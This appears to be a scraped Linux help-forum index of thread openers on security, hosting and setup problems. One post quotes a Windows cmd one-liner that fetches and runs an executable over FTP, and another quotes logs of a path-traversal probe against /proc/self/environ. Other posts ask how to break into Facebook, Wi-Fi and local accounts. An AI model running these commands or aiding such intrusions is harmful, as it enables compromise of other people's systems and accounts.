Security :: Hack Website For CCNA Study Sake?
Jan 11, 2010
I am currently taking my CCNA course. I have come to realize that to be a great Admin and secure a companies data, you first have to know it's weakness. Now I have become aware of a few programs like John the ripper telnet password crack, nmap, and the like. Well I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in.To get my website info I used :
[Code]...
View 12 Replies
ADVERTISEMENT
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Aug 2, 2010
Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?
View 9 Replies
View Related
Jan 17, 2011
1. I understand you can protect your files or directories in your website by setting file/directory permissions. The meaning of r w x is clear to me, but I'm not sure how to proceed... Starting with the index.html file, if I wanted to make it so that anyone in the world can read it but can't modify it, do I set its permissions to rwxr-xr-x? If I set it to rwxr--r--, would that mean the file couldn't be served? I mean, what does the x setting do on a .html file, how can a .html file be executable?
2. If file permissions work on the lines of owner-group-others, in the context of a website, who is 'group'? As far as I can tell, there's only the owner, which is me, and others, which is the world accessing the site. Am I correct in thinking that by default, say when creating a website on a shared hosting server, there is no group unless I specifically set one up?
3. My ISP allows the DynDNS.org service, meaning that I could serve a website from my home. It's too early to go that route just yet, but for future reference, I would like to ask about the server software called Hiawatha. It is said to be secure, but having read some evaluations of it, it doesn't seem to offer anything that couldn't be accomplished with Apache or Cherokee, it's just that its security settings are simpler and easier to configure. Am I right about this? Or does Hiawatha truly offer something that the other major server packages don't?
View 9 Replies
View Related
Feb 24, 2010
1) Is there any Sync b/w Red Hat and CCNA.... if yes then wht are the future prospective ?
2) what s the best method to understand Linux?
View 4 Replies
View Related
Feb 3, 2011
I'm trying to install VMware Tools for the sake of the SVGA driver alone. For the life of me, I cannot get it to work. I'm able to run ./vmware-install.pl but when it comes to configuring it that's where I've run into trouble. I've been trying and trying and trying and trying all morning to get this to work and I'm getting very frustrated now. It keeps asking me, "What is the location of the directory of C header files that match your running kernel?" I've Googled this and read several threads on the issue, tried every conceivable path I think it might be and it keeps coming back again and again saying "The path "<path>" is not valid. Would you like to change it?" WTF!? Can somebody please tell me what the default location of the C header files is under Fedora 14? Geez Louise I just want to install VMware Tools, for Christ's sake! It shouldn't be this difficult. BTW,
View 3 Replies
View Related
Feb 20, 2011
I am new to this linux environment. i want to become unix system admin .please suggest me study material .which is best .and tips to remember commands
View 2 Replies
View Related
Nov 1, 2010
on my linux server i have many websites, before i use this command
netstat -anpl|grep :80|awk {'print $5'}|cut -d":" -f1|sort|uniq -c|sort -n
to see all the ips with many connection but the problem is is show me all the ips from all the websites from the server, can be another way to show me all the ips just from my website ?
View 1 Replies
View Related
May 25, 2011
I want to set up a website that hosts very confidential business information. The info needs to be accessed by multiple people in different geographical regions. The entire website would require the high security (ie: there are no little sections that are publicly viewable). While the site will be run with Ubuntu server, I will be hosting it in Amazon's EC2 cloud.
So, if I use the HTTPS protocol with an SSL certificate, am I pretty well reaching the most secure possible situation? Are there any concerns with using the EC2 solution? Obviously there are a LOT of variables involved with maintaining website security, but I want to know if HTTPS is the current best bet (in addition to all the "best practices" of securing a site) or if there is a more robust way of securing content.
View 9 Replies
View Related
Oct 25, 2010
I am new to linux and am using fedora12 someone post me a good and free ebook link to study fedora.
View 2 Replies
View Related
Oct 8, 2010
A friend of mine has a private forum setup so he and I can communicate back and forth so we don't have to send emails. The link is a "https://" so I'm assuming it's secure. I'm a newbie to ubuntu and I have already switch 3 of my computers at home to ubuntu.
I'm using Ubuntu 10.04 and google chrome as my browser. When I log into his forum it pops up with a screen saying "The site's security certificate is not trusted" and I always click proceed anyways. I'm not worried about this because I'm 110% sure that it's his website that I'm trying to access. My question/problem is it also pops up with a little box telling me to enter my Username and Password every time. When I was using WindowsXP, I had to enter this info once and then I wouldn't have to enter it again.
View 4 Replies
View Related
Feb 27, 2011
For example would a website log the mac address of my ethernet adapter and my computer name?
View 4 Replies
View Related
Jul 17, 2011
I don't care for domain 'authentication' by an "Authority". I don't trust no one, so CA's to me are as trustworthy as the gypsy in the park.
I can use a self-signed certificate, but the problem is most browsers makers are Fn idiots that say the connection is not secure, when it actually it, but because I did not folk out cash, it makes my website look bad.
I can understand the need for a 3rd party to verify the domain host to prevent man in the middle attacks, but I do not care for this.. and browser makers should take more responsibility and introduce different padlocks for types of authentication, rather than saying "this connection is encrypted, but not secure because its self-signed". What a load of horse s***!
How many times does people stop to read certificate authorities? I sure don't. I only care weather or not the connection has been encrypted.. so, I am looking for a way for simply providing encryption for my website.
From what I understand, when you submit a CSR to a CA, it includes the private key, meaning that the CA would be able to see the encrypt data, should they get hold of it. This is not acceptable for me.
Is there anything other way to use encryption other than the SSL model that is used typically amongst HTTPS browsers today?
View 3 Replies
View Related
Mar 24, 2011
i am using RHEL 5. i configured proxy server. now i want block one website.
View 2 Replies
View Related
Mar 19, 2011
I went to visit a website that I frequent and firefox through a error that basically said that the internet connection might be being tampered with and that the website was not authenticated. Meaning someone might be trying to load a fake website into my browser and impersonate the website to give me viruses or something.It's a website I frequent. Also the website doesn't have the www. in the url.[URL]..
View 9 Replies
View Related
Feb 4, 2010
I am trying to find a copy of the following book by Michael Jang; RHCT Red Hat Certified Technician Linux Study Guide (Exam RH202)at a reasonable price.
View 2 Replies
View Related
May 6, 2010
So I forgot how to do something in Compiz and I quickly Googled it to find the answer. On the first or second link I clicked, a pop-up box opened from Firefox saying that I should scan my computer. Immediately, I pressed the X button, but a page started to load that tried to "scan" my computer. I closed out Firefox and re-opened it. I did the exact same search again on Google, but I clicked on the cached view of the site. It was harmless enough--a blog with some ads on the side of the page. I'm assuming that it was one of the ads that somehow must have taken over the page.
Anyway, I know that the discussion of anti-virus programs is not anything new, but I would like to know if this virus may have affected Ubuntu. What would you guys recommend in this case?Also, after running the update manager, I received a pop-up box asking if I would like to update Grub. Is this a normal part of the update, or could it be a virus? I'm a bit paranoid, being from the land of Windows.
View 6 Replies
View Related
Nov 4, 2010
I'd like to know if this is common security flaw or normal to open up FTP to the public which is of course protected with password for 3rd party access to maintain our public facing / production website ?
If yes, what sort of FTP application to install in Ubuntu ?
View 1 Replies
View Related
Oct 7, 2010
I have a server with a couple of sites on it. Some of them have a webform where people can send them emails that they are interested in their work etc. though the "To:" and "From:" adress can't be change by the enduser, you can only enter text and press send. However it seems that someone (not on the server) has found a hole/exploit to use those webforms to send mails to who ever he wants.. I have the webserver setup with ssmtp (simple smtp) and it just forwards the mail sent from the server to my mail-server and there on it sends it out on the internet. If I check my log on the mail-server I can see the whole smtp session, where it's comming from and where it's going etc. I see that it comes from my webserver and over there I only have these log entries:
Oct 6 22:04:47 ettan2 sSMTP[1771]: Sent mail for itaumail@itau.com.br (221 2.0.0 Bye) uid=204 username=torget outbytes=3290
There are loads of those log entries, mostly at after office-hours between 17:00 and 7:00 I have scanned through all the Apache logs and can't find Anything that point to the e-mail addresses used or something like that. The reason I found this out was because he tries to send to a host that doesn't allow connection on port 25 so all the mails got stuck in the queue, over 1000 atm.. I'm using Apache 2.2 and Postfix 2.6 on a Debian Lenny install. What can I do to find out how he's doing this and close the "exploit"? Who would you recommend to setup the mail() thing in PHP for most security?
View 6 Replies
View Related
Apr 4, 2011
Basically, whenever I am on an unencrypted wireless hotspot, I open up an SSH tunnel to my home server to do all my browsing for the privacy and security it provides.But I got to thinking, and now I am curious, if I am visiting a site like gmail for instance that always uses SSL/TLS for it's connections, is there any added benefit to also using an encrypted tunnel? or is it perhaps superfluous to use both
View 3 Replies
View Related
May 19, 2011
I get an Untrusted Connection error when I visit this site to login into my GRE account, and I cannot add it as an exception, in Mozilla Firefox 4.0 on Ubuntu 11.04. When I visit the site using Chrome, I have no issues. Is this a bug in Firefox's certificate management? I'm using Ubuntu 11.04. I do not get this error in Windows' Firefox 4.0.
View 3 Replies
View Related
Nov 4, 2010
I'd like to know if this is common security flaw or normal to open up FTP to the public which is of course protected with password for 3rd party access to maintain our public facing / production website ? If yes, what sort of FTP application to install in your Linux webserver?
View 7 Replies
View Related
Oct 3, 2010
I installed Boxee on my 64bit install. I had to edit the DEB so it did not install Flash, because Ubuntu still insists on installing the 32bit version which always borks Firefox.
But now I cant run synaptic without getting complaints of broken packages. I just want to blacklist boxee from from annoying the hell out of me, but keep it installed. How do I go about doing that?
View 3 Replies
View Related
Apr 13, 2011
I have received the following log messages on my Debian Squeeze webserver:Apr 13 15:16:37 vps suhosin[4699]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'controller' (attacker '75.126.235.115', file '/var/www/xxxxxxxxxxxxx.com
75.126.235.115 - - [13/Apr/2011:15:16:37 +0100] "GET /index.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8018 "-" "libwww-perl/6.01"
[code]....
View 1 Replies
View Related
Oct 9, 2010
How to hack a facebook account? I need, because someone break into my Facebook and i need to get my password back<~
View 7 Replies
View Related
Nov 28, 2010
Any 1 who uses Linux knows that one problem with many distros (if not all) can't play flash videos fullscreen and change volume at the same time. Very very very very annoying.
But I think I might have come across a fix possibly probably not but who knows!!!
Here is the story. I was on my windows partition playing some games, but i also wanted to watch hulu on my second screen. To my amazement flash would exit full screen (on second screen) when it became out of focus because of a click on my main screen. so i did a search on the web and they have a flash hack that keeps it from exiting when it loses main focus. This is what we need!! can some1 with slightly more hacking know-how then me make this hack work for us over on linux?
here is the link
http://bramp.net/blog/full-screen-hack-for-flash
View 3 Replies
View Related
Feb 12, 2011
Last week some bad news hitted us, my uncle deceased at the age of 39, to young and very unexpected. We enherited his computer, but theres a password on his account. Googling didnt really worked for me.. I have totally 0 experience on linux systems. Is there a way to 'hack' his account and get access to his files, fotos and other stuff that is precious to us?
View 12 Replies
View Related
Jun 21, 2010
I am currently running a old school hacked Linksys WRT54G and have played around with some of the hacks and currently running Tomato on it and I am pretty happy (tho the lack of OpenVPN Server suck) but I need an upgrade to something with 802.11N and I bet I am not the only one. The options right now are
Grab a hackable consumer 802.11 Dual Band-N router and throw on it DD-WRT, OpenWRT or Tomato again Build my own using old hardware (dont really want to, feel they eat too much power for a simple task) Build/Buy hardware for a custom router (Atom system, or I recall back in the day some people use to sell small ATX-like boards just for embedded linux to run as a router) So what option would you go with and why? And if the DIY route should I try to get some hardware that is pre made for the job or DYI like a Atom machine.
View 2 Replies
View Related
May 25, 2010
Recently I had a problem with my gf.. now ex.. she put a pssword on the network.. and now I cannot get in.. anyway to hack it? I just want to be able to connect online while at home..
View 8 Replies
View Related
Oct 31, 2010
I'm using 10.04 with Gnome and I've just discovered that Kaffeine works with my TV card provided I use the modprobe hack. So I created /bin/dtvfix with the following:
Code:
#!/bin/bash
/sbin/modprobe -vr dvb_bt8xx
[code]....
View 9 Replies
View Related
